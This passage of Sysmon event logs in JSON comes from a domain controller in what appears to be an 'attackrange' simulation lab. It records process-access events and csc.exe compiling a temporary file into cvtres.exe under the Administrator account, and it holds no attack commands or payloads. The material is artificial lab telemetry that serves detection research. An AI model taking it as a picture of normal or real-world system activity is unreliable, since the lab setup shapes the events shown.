05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4948,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4949,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4950,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4951,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.421\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-00101ADF0700}\r\nTargetProcessId: 2708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.421","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-00101ADF0700}","TargetProcessId":"2708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4952,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.498\r\nProcessGuid: {A837DB8D-0325-5F25-0000-0010A2E20700}\r\nProcessId: 2844\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB945.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\CSC257E217AD11A4317A114A762E0E45120.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-0325-5F25-0000-00101ADF0700}\r\nParentProcessId: 2708\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.498","ProcessGuid":"{A837DB8D-0325-5F25-0000-0010A2E20700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB945.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\CSC257E217AD11A4317A114A762E0E45120.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-0325-5F25-0000-00101ADF0700}","ParentProcessId":"2708","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.cmdline\"","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4953,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-0325-5F25-0000-00101ADF0700}\r\nSourceProcessId: 2708\r\nSourceThreadId: 1296\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010A2E20700}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-0325-5F25-0000-00101ADF0700}","SourceProcessId":"2708","SourceThreadId":"1296","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010A2E20700}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4954,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010A2E20700}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.484","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010A2E20700}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4955,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 